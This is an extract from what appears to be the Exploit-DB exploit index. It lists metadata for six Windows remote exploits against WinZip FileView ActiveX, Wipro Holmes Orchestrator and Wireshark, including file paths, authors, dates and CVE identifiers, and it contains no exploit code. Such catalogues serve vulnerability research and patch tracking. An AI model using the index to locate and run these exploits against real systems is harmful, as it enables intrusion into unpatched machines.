2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,,2006-11-14,2016-09-14,1,CVE-2006-6884,,,,http://www.exploit-db.comwinzip110.exe,
16607,exploits/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2011-03-10,1,CVE-2006-5198;OSVDB-30433,"Metasploit Framework (MSF)",,,,
52032,exploits/windows/remote/52032.py,"Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure",2024-06-01,ub3rsick,remote,windows,,2024-06-01,2024-06-01,0,CVE-2021-38283,,,,,
18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows,,2011-11-19,2011-11-19,1,CVE-2011-3360;OSVDB-75347,"Metasploit Framework (MSF)",,,,http://technet.microsoft.com/en-us/security/advisory/2269637
11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",remote,windows,,2010-02-14,2010-09-05,1,,,,http://www.exploit-db.com/screenshots/idlt11500/wire-poc.png,http://www.exploit-db.comwireshark-win32-1.2.5.exe,
17195,exploits/windows/remote/17195.rb,"Wireshark 1.4.4 - 'packet-dect.c' Remote Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,remote,windows,,2011-04-21,2011-04-21,1,CVE-2011-1591;OSVDB-71848,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.4.1.exe,

Can't render this file because it is too large.